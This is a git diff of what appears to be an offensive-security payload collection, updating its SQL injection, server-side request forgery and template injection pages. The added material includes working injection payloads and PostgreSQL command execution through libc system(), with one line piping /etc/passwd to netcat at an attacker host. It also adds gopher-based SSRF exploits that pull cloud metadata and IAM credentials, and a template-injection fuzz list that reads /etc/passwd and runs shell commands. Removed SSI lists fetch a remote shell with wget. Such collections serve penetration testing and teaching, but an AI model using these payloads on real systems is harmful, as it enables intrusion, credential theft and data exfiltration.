+* [Oracle SQL Error Based](#oracle-sql-error-based)
+* [Oracle SQL Blind](#oracle-sql-blind)
+* [Oracle SQL Time Based](#oracle-sql-time-based)
+* [Oracle SQL Command execution](#oracle-sql-command-execution)
+* [References](#references)
+
 ## Oracle SQL version
 
 ```sql
@@ -21,7 +34,7 @@ SELECT SYS.DATABASE_NAME FROM DUAL;
 SELECT DISTINCT owner FROM all_tables;
 ```
 
-## Oracle SQL List Column
+## Oracle SQL List Columns
 
 ```sql
 SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md
index e8880db8..00bbbf41 100644
--- a/SQL Injection/PostgreSQL Injection.md	
+++ b/SQL Injection/PostgreSQL Injection.md	
@@ -1,4 +1,28 @@
-# POSTGRESQL
+# PostgreSQL injection
+
+## Summary
+
+* [PostgreSQL Comments](#postgresql-comments)
+* [PostgreSQL version](#postgresql-version)
+* [PostgreSQL Current User](#postgresql-current-user)
+* [PostgreSQL List Users](#postgresql-list-users)
+* [PostgreSQL List Password Hashes](#postgresql-list-password-hashes)
+* [PostgreSQL List Database Administrator Accounts](#postgresql-list-database-administrator-accounts)
+* [PostgreSQL List Privileges](#postgresql-list-privileges)
+* [PostgreSQL database name](#postgresql-database-name)
+* [PostgreSQL List databases](#postgresql-list-database)
+* [PostgreSQL List tables](#postgresql-list-tables)
+* [PostgreSQL List columns](#postgresql-list-columns)
+* [PostgreSQL Error Based](#postgresql-error-based)
+* [PostgreSQL Blind](#postgresql-blind)
+* [PostgreSQL Time Based](#postgresql-time-based)
+* [PostgreSQL Stacked query](#postgresql-stacked-query)
+* [PostgreSQL File Read](#postgresql-file-read)
+* [PostgreSQL File Write](#postgresql-file-write)
+* [PostgreSQL Command execution](#postgresql-command-execution)
+    * [CVE-2019–9193](#cve-20199193)
+    * [Using libc.so.6](#using-libcso6)
+* [References](#references)
 
 ## PostgreSQL Comments
 
@@ -7,13 +31,86 @@
 /**/  
 ```
 
-## PostgreSQL Error Based - Basic
+## PostgreSQL Version
+
+```sql
+SELECT version()
+```
+
+## PostgreSQL Current User	
+
+```sql
+SELECT user;
+SELECT current_user;
+SELECT session_user;
+SELECT usename FROM pg_user;
+SELECT getpgusername();
+```
+
+## PostgreSQL List Users
+
+```sql
+SELECT usename FROM pg_user
+```
+
+## PostgreSQL List Password Hashes
+
+```sql
+SELECT usename, passwd FROM pg_shadow 
+```
+## PostgreSQL List Database Administrator Accounts
+```sql
+SELECT usename FROM pg_user WHERE usesuper IS TRUE
+```
+## PostgreSQL List Privileges
+
+```sql
+SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
+```
+
+## PostgreSQL Database Name
+
+```sql
+SELECT current_database()
+```
+
+## PostgreSQL List Database
+
+```sql
+SELECT datname FROM pg_database
+```
+
+## PostgreSQL List Tables
+
+```sql
+SELECT table_name FROM information_schema.tables
+```
+
+## PostgreSQL List Columns
+
+```sql
+SELECT column_name FROM information_schema.columns WHERE table_name='data_table'
+```
+
+## PostgreSQL Error Based
 
 ```sql
 ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
 ,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
-,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
+,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
 ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
+
+' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
+' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
+' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
+' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1
+```
+
+## PostgreSQL Blind
+
+```sql
+' and substr(version(),1,10) = 'PostgreSQL' and '1  -> OK
+' and substr(version(),1,10) = 'PostgreXXX' and '1  -> KO
 ```
 
 ## PostgreSQL Time Based
@@ -23,6 +120,14 @@ AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
 AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
 ```
 
+## PostgreSQL Stacked Query
+
+Use a semi-colon ";" to add another query
+
+```sql
+http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));--
+```
+
 ## PostgreSQL File Read
 
 ```sql
@@ -47,9 +152,11 @@ SELECT * FROM pentestlab;
 COPY pentestlab(t) TO '/tmp/pentestlab';
 ```
 
-## PostgreSQL - Command execution
+## PostgreSQL Command execution
 
-CVE-2019–9193, can be used from [Metasploit](https://github.com/rapid7/metasploit-framework/pull/11598) if you have a direct access to the database, otherwise you need to execute manually the following SQL queries. 
+### CVE-2019–9193
+
+Can be used from [Metasploit](https://github.com/rapid7/metasploit-framework/pull/11598) if you have a direct access to the database, otherwise you need to execute manually the following SQL queries. 
 
 ```SQL
 DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Drop the table you want to use if it already exists
@@ -61,7 +168,16 @@ DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Remove the table
 
 ![https://cdn-images-1.medium.com/max/1000/1*xy5graLstJ0KysUCmPMLrw.png](https://cdn-images-1.medium.com/max/1000/1*xy5graLstJ0KysUCmPMLrw.png)
 
+### Using libc.so.6
+
+```sql
+CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
+SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
+```
+
 ## References
 
 * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
-* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
\ No newline at end of file
+* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
+* [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803)
+* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution)
diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index 87913ec4..f3eeb33e 100644
--- a/SQL Injection/README.md	
+++ b/SQL Injection/README.md	
@@ -19,6 +19,17 @@ Attempting to manipulate SQL queries may have goals including:
 * [Entry point detection](#entry-point-detection)
 * [DBMS Identification](#dbms-identification)
 * [SQL injection using SQLmap](#sql-injection-using-sqlmap)
+  * [Basic arguments for SQLmap](#basic-arguments-for-sqlmap)
+  * [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent)
+  * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie)
+  * [Second order injection](#second-order-injection)
+  * [Shell](#shell)
+  * [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit)
+  * [Using TOR with SQLmap](#using-tor-with-sqlmap)
+  * [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap)
+  * [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
+  * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
+  * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
 * [Authentication bypass](#authentication-bypass)
 * [Polyglot injection](#polyglot-injection-multicontext)
 * [Routed injection](#routed-injection)
@@ -41,6 +52,7 @@ Simple characters
 %3B
 )
 Wildcard (*)
+&apos;  # required for XML content
 ```
 
 Multiple encoding
@@ -276,6 +288,9 @@ tamper=name_of_the_tamper
 "&"
 "^"
 "*"
+'--'
+"--"
+'--' / "--"
 " or ""-"
 " or "" "
 " or ""&"
@@ -428,12 +443,13 @@ SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
 SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
 ```
 
-No Equal - bypass using LIKE/NOT IN/IN
+No Equal - bypass using LIKE/NOT IN/IN/BETWEEN
 
 ```sql
 ?id=1 and substring(version(),1,1)like(5)
 ?id=1 and substring(version(),1,1)not in(4,3)
 ?id=1 and substring(version(),1,1)in(4,3)
+?id=1 and substring(version(),1,1) between 3 and 4
 ```
 
 Blacklist using keywords - bypass using uppercase/lowercase
@@ -449,7 +465,7 @@ Blacklist using keywords case insensitive - bypass using an equivalent operator
 ```sql
 AND   -> &&
 OR    -> ||
-=     -> LIKE,REGEXP, not < and not >
+=     -> LIKE,REGEXP, BETWEEN, not < and not >
 > X   -> not between 0 and X
 WHERE -> HAVING
 ```
diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md
index 0631c0bd..dcece85e 100644
--- a/SQL Injection/SQLite Injection.md	
+++ b/SQL Injection/SQLite Injection.md	
@@ -1,5 +1,18 @@
 # SQLite Injection
 
+## Summary
+
+* [SQLite comments](#sqlite-comments)
+* [SQLite version](#sqlite-version)
+* [Integer/String based - Extract table name](#integerstring-based---extract-table-name)
+* [Integer/String based - Extract column name](#integerstring-based---extract-column-name)
+* [Boolean - Count number of tables](#boolean---count-number-of-tables)
+* [Boolean - Enumerating table name](#boolean---enumerating-table-name)
+* [Boolean - Extract info](#boolean---extract-info)
+* [Time based](#time-based)
+* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
+* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
+* [References](#references)
 ## SQLite comments
 
 ```sql
@@ -75,4 +88,4 @@ Note: By default this component is disabled
 
 ## References
 
-[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)
+[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
diff --git a/Server Side Template Injection/Files/SSRF_expect.svg b/Server Side Request Forgery/Files/SSRF_expect.svg
similarity index 100%
rename from Server Side Template Injection/Files/SSRF_expect.svg
rename to Server Side Request Forgery/Files/SSRF_expect.svg
diff --git a/Server Side Template Injection/Files/SSRF_url.svg b/Server Side Request Forgery/Files/SSRF_url.svg
similarity index 100%
rename from Server Side Template Injection/Files/SSRF_url.svg
rename to Server Side Request Forgery/Files/SSRF_url.svg
diff --git a/Server Side Request Forgery/Files/ssrf_svg_css_import.svg b/Server Side Request Forgery/Files/ssrf_svg_css_import.svg
new file mode 100644
index 00000000..8c1f4466
--- /dev/null
+++ b/Server Side Request Forgery/Files/ssrf_svg_css_import.svg	
@@ -0,0 +1,7 @@
+<svg xmlns="http://www.w3.org/2000/svg">
+  <style>
+    @import url(http://example.com/style.css);
+  </style>
+  <circle cx="50" cy="50" r="45" fill="green"
+          id="foo"/>
+</svg>
\ No newline at end of file
diff --git a/Server Side Request Forgery/Files/ssrf_svg_css_link.svg b/Server Side Request Forgery/Files/ssrf_svg_css_link.svg
new file mode 100644
index 00000000..e9f7d305
--- /dev/null
+++ b/Server Side Request Forgery/Files/ssrf_svg_css_link.svg	
@@ -0,0 +1,6 @@
+<svg width="100%" height="100%" viewBox="0 0 100 100"
+     xmlns="http://www.w3.org/2000/svg">
+	<link xmlns="http://www.w3.org/1999/xhtml" rel="stylesheet" href="http://example.com/style.css" type="text/css"/>
+  <circle cx="50" cy="50" r="45" fill="green"
+          id="foo"/>
+</svg>
\ No newline at end of file
diff --git a/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg b/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg
new file mode 100644
index 00000000..a29199af
--- /dev/null
+++ b/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg	
@@ -0,0 +1,6 @@
+<?xml-stylesheet href="http://example.com/style.css"?>
+<svg width="100%" height="100%" viewBox="0 0 100 100"
+     xmlns="http://www.w3.org/2000/svg">
+  <circle cx="50" cy="50" r="45" fill="green"
+          id="foo"/>
+</svg>
\ No newline at end of file
diff --git a/Server Side Request Forgery/Files/ssrf_svg_image.svg b/Server Side Request Forgery/Files/ssrf_svg_image.svg
new file mode 100644
index 00000000..9d3b717e
--- /dev/null
+++ b/Server Side Request Forgery/Files/ssrf_svg_image.svg	
@@ -0,0 +1,4 @@
+<svg width="200" height="200"
+  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <image xlink:href="https://example.com/image.jpg" height="200" width="200"/>
+</svg>
\ No newline at end of file
diff --git a/Server Side Request Forgery/Files/ssrf_svg_use.svg b/Server Side Request Forgery/Files/ssrf_svg_use.svg
new file mode 100644
index 00000000..14040b20
--- /dev/null
+++ b/Server Side Request Forgery/Files/ssrf_svg_use.svg	
@@ -0,0 +1,4 @@
+<svg width="200" height="200"
+  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <use xlink:href="https://example.com/file2.svg#foo"/>
+</svg>
\ No newline at end of file
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index b2726c14..8cc65922 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -8,17 +8,17 @@
 * [Payloads with localhost](#payloads-with-localhost)
 * [Bypassing filters](#bypassing-filters)
   * [Bypass using HTTPS](#bypass-using-https)
-  * [Bypass localhost with [::]](#bypass-localhost-with----)
+  * [Bypass localhost with [::]](#bypass-localhost-with-)
   * [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection)
   * [Bypass localhost with CIDR](#bypass-localhost-with-cidr)
   * [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location)
-  * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6-ipv4-address-embedding)
+  * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding)
   * [Bypass using malformed urls](#bypass-using-malformed-urls)
   * [Bypass using rare address](#bypass-using-rare-address)
   * [Bypass using bash variables](#bypass-using-bash-variables)
   * [Bypass using tricks combination](#bypass-using-tricks-combination)
   * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)
-  * [Bypass filter_var() php function](#bypass-filter-var-php-function)
+  * [Bypass filter_var() php function](#bypass-filter_var-php-function)
   * [Bypass against a weak parser](#bypass-against-a-weak-parser)
 * [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme)
   * [file://](#file)
@@ -28,10 +28,14 @@
   * [tftp://](#tftp)
   * [ldap://](#ldap)
   * [gopher://](#gopher)
+  * [netdoc://](#netdoc)
+* [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)
 * [SSRF to XSS](#ssrf-to-xss)
 * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
   * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
+  * [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs)
   * [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk)
+  * [SSRF URL for AWS Lambda](#ssrf-url-for-aws-lambda)
   * [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud)
   * [SSRF URL for Digital Ocean](#ssrf-url-for-digital-ocean)
   * [SSRF URL for Packetcloud](#ssrf-url-for-packetcloud)
@@ -48,6 +52,8 @@
 
 - [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap)
 - [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)
+- [See-SURF - https://github.com/In3tinct/See-SURF](https://github.com/In3tinct/See-SURF)
+- [SSRF Sheriff - https://github.com/teknogeek/ssrf-sheriff](https://github.com/teknogeek/ssrf-sheriff)
 
 ## Payloads with localhost
 
@@ -114,6 +120,7 @@ http://0000::1:3128/ Squid
 ### Bypass localhost with a domain redirection
 
 ```powershell
+http://spoofed.burpcollaborator.net
 http://localtest.me
 http://customer1.app.localhost.my.company.127.0.0.1.nip.io
 http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
@@ -216,7 +223,7 @@ http://127.1.1.1:80:\@@127.2.2.2:80/
 http://127.1.1.1:80#\@127.2.2.2:80/
 ```
 
-![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20Injection/Images/WeakParser.jpg)
+![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true)
 
 
 ## SSRF exploitation via URL Scheme
@@ -242,7 +249,7 @@ ssrf.php?url=http://127.0.0.1:80
 ssrf.php?url=http://127.0.0.1:443
 ```
 
-![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20Injection/Images/SSRF_stream.png)
+![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_stream.png?raw=true)
 
 The following URL scheme can be used to probe the network
 
@@ -341,6 +348,36 @@ Content of evil.com/redirect.php:
 ?>
 ```
 
+### Netdoc
+
+Wrapper for Java when your payloads struggle with "\n" and "\r" characters.
+
+```powershell
+ssrf.php?url=gopher://127.0.0.1:4242/DATA
+```
+
+## SSRF exploiting WSGI
+
+Exploit using the Gopher protocol, full exploit script available at https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py.
+
+```powershell
+gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py
+```
+
+| Header    |           |             |
+|-----------|-----------|-------------|
+| modifier1 | (1 byte)  | 0 (%00)     |
+| datasize  | (2 bytes) | 26 (%1A%00) |
+| modifier2 | (1 byte)  | 0 (%00)     |
+
+| Variable (UWSGI_FILE) |           |    |            |   |
+|-----------------------|-----------|----|------------|---|
+| key length            | (2 bytes) | 10 | (%0A%00)   |   |
+| key data              | (m bytes) |    | UWSGI_FILE |   |
+| value length          | (2 bytes) | 12 | (%0C%00)   |   |
+| value data            | (n bytes) |    | /tmp/test.py   |   |
+	
+
 ## SSRF to XSS 
 
 by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
@@ -357,7 +394,7 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brut
 ### SSRF URL for AWS Bucket
 
 [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
-Interesting path to look for at `http://169.254.169.254`
+Interesting path to look for at `http://169.254.169.254` or `http://instance-data`
 
 ```powershell
 Always here : /latest/meta-data/{hostname,public-ipv4,...}
@@ -368,6 +405,7 @@ Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
 DNS record
 
 ```powershell
+http://instance-data
 http://169.254.169.254
 http://metadata.nicob.net/
 http://169.254.169.254.xip.io/
@@ -418,6 +456,15 @@ E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugi
 
 E.g2: Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/`
 
+### SSRF URL for AWS ECS
+
+If you have an SSRF with file system access on an ECS instance, try extracting `/proc/self/environ` to get UUID.
+
+```powershell
+curl http://169.254.170.2/v2/credentials/<UUID>
+```
+
+This way you'll extract IAM keys of the attached role
 
 ### SSRF URL for AWS Elastic Beanstalk
 
@@ -439,8 +486,21 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean
 Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
 
 
+### SSRF URL for AWS Lambda
+
+AWS Lambda provides an HTTP API for custom runtimes to receive invocation events from Lambda and send response data back within the Lambda execution environment.
+
+```powershell
+http://localhost:9001/2018-06-01/runtime/invocation/next
+$ curl "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next"
+```
+
+Docs: https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html#runtimes-api-next
+
 ### SSRF URL for Google Cloud
 
+:warning: Google is shutting down support for usage of the **v1 metadata service** on January 15.
+
 Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
 
 ```powershell
@@ -465,6 +525,12 @@ http://metadata.google.internal/computeMetadata/v1beta1/
 http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
 ```
 
+Required headers can be set using a gopher SSRF with the following technique
+
+```powershell
+gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a
+```
+
 Interesting files to pull out:
 
 - SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`
@@ -592,6 +658,11 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
 bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
 ```
 
+More info:
+
+- Daemon socket option: https://docs.docker.com/engine/reference/commandline/dockerd/#daemon-socket-option
+- Docker Engine API: https://docs.docker.com/engine/api/latest/
+
 ### SSRF URL for Rancher
 
 ```powershell
@@ -628,4 +699,8 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
 - [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978)
 - [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/)
 - [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
-- [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/)
\ No newline at end of file
+- [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/)
+- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf)
+- [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet)
+- [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/)
+- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html)
diff --git a/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt b/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt
deleted file mode 100644
index 9b7ba084..00000000
--- a/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt	
+++ /dev/null
@@ -1,75 +0,0 @@
-<pre><!--#exec cmd="ls" --></pre>
-<pre><!--#echo var="DATE_LOCAL" --> </pre>
-<pre><!--#exec cmd="whoami"--></pre>
-<pre><!--#exec cmd="dir" --></pre>
-<!--#exec cmd="ls" -->
-<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
-<!--#exec cmd="/bin/ls /" -->
-<!--#exec cmd="dir" -->
-<!--#exec cmd="cd C:\WINDOWS\System32">
-<!--#config errmsg="File not found, informs users and password"-->
-<!--#echo var="DOCUMENT_NAME" -->
-<!--#echo var="DOCUMENT_URI" -->
-<!--#config timefmt="A %B %d %Y %r"-->
-<!--#fsize file="ssi.shtml" -->
-<!--#include file=?UUUUUUUU...UU?-->
-<!--#echo var="DATE_LOCAL" --> 
-<!--#exec cmd="whoami"--> 
-<!--#printenv -->
-<!--#flastmod virtual="echo.html" -->
-<!--#echo var="auth_type" -->
-<!--#echo var="http_referer" -->
-<!--#echo var="content_length" -->
-<!--#echo var="content_type" -->
-<!--#echo var="http_accept_encoding" -->
-<!--#echo var="forwarded" -->
-<!--#echo var="document_uri" -->
-<!--#echo var="date_gmt" -->
-<!--#echo var="date_local" -->
-<!--#echo var="document_name" -->
-<!--#echo var="document_root" -->
-<!--#echo var="from" -->
-<!--#echo var="gateway_interface" -->
-<!--#echo var="http_accept" -->
-<!--#echo var="http_accept_charset" -->
-<!--#echo var="http_accept_language" -->
-<!--#echo var="http_connection" -->
-<!--#echo var="http_cookie" -->
-<!--#echo var="http_form" -->
-<!--#echo var="http_host" -->
-<!--#echo var="user_name" -->
-<!--#echo var="unique_id" -->
-<!--#echo var="tz" -->
-<!--#echo var="total_hits" -->
-<!--#echo var="server_software" -->
-<!--#echo var="server_protocol" -->
-<!--#echo var="server_port" -->
-<!--#echo var="server_name -->
-<!--#echo var="server_addr" -->
-<!--#echo var="server_admin" -->
-<!--#echo var="script_url" -->
-<!--#echo var="script_uri" -->
-<!--#echo var="script_name" -->
-<!--#echo var="script_filename" -->
-<!--#echo var="netsite_root" -->
-<!--#echo var="site_htmlroot" -->
-<!--#echo var="path_translated" -->
-<!--#echo var="path_info_translated" -->
-<!--#echo var="request_uri" -->
-<!--#echo var="request_method" -->	
-<!--#echo var="remote_user" -->
-<!--#echo var="remote_addr" -->
-<!--#echo var="http_client_ip" -->
-<!--#echo var="remote_port" -->
-<!--#echo var="remote_ident" -->
-<!--#echo var="remote_host" -->
-<!--#echo var="query_string_unescaped" -->
-<!--#echo var="query_string" -->
-<!--#echo var="path_translated" -->
-<!--#echo var="path_info" -->
-<!--#echo var="path" -->
-<!--#echo var="page_count" -->
-<!--#echo var="last_modified" -->
-<!--#echo var="http_user_agent" -->
-<!--#echo var="http_ua_os" -->
-<!--#echo var="http_ua_cpu" -->
diff --git a/Server Side Template Injection/Intruder/ssi_quick.txt b/Server Side Template Injection/Intruder/ssi_quick.txt
deleted file mode 100644
index fef3ab22..00000000
--- a/Server Side Template Injection/Intruder/ssi_quick.txt	
+++ /dev/null
@@ -1,18 +0,0 @@
-</nowiki>
-<!--#echo var="DOCUMENT_NAME" -->
-<!--#echo var="DOCUMENT_URI" -->
-<!--#config timefmt="A %B %d %Y %r"-->
-<!--#echo var="DATE_LOCAL" -->
-<!--#include virtual="http://xerosecurity.com/.testing/rfi_vuln.php" -->
-<!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" -->
-<!--#include virtual="/" -->
-<!--#exec cmd="ls" -->
-<!--#exec cmd="whoami" -->
-<!--#exec cmd="uname" -->
-<!--#exec cmd="dir" -->
-<!--#exec cmd="cat /etc/passwd" -->
-<!--#exec cmd="ipconfig" -->
-<!--#exec cmd="curl http://xerosecurity.com/.testing/rfi_vuln.php" -->
-<!--#exec cmd="perl -e 'print "X"*5000'" -->
-<!--#exec cmd="sleep 5" -->
-<!--#exec cmd="sleep 10" -->
diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz
new file mode 100644
index 00000000..ced385b4
--- /dev/null
+++ b/Server Side Template Injection/Intruder/ssti.fuzz	
@@ -0,0 +1,49 @@
+
+{{4*4}}[[5*5]]
+{{7*7}}
+{{7*'7'}}
+<%= 7 * 7 %>
+${3*3}
+${{7*7}}
+@(1+2)
+#{3*3}
+#{ 7 * 7 }
+{{dump(app)}}
+{{app.request.server.all|join(',')}}
+{{config.items()}}
+{{ [].class.base.subclasses() }}
+{{''.class.mro()[1].subclasses()}}
+{{ ''.__class__.__mro__[2].__subclasses__() }}
+{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
+{{'a'.toUpperCase()}} 
+{{ request }}
+{{self}}
+<%= File.open('/etc/passwd').read %>
+<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
+[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
+${"freemarker.template.utility.Execute"?new()("id")}
+{{app.request.query.filter(0,0,1024,{'options':'system'})}}
+{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
+{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
+{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
+{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
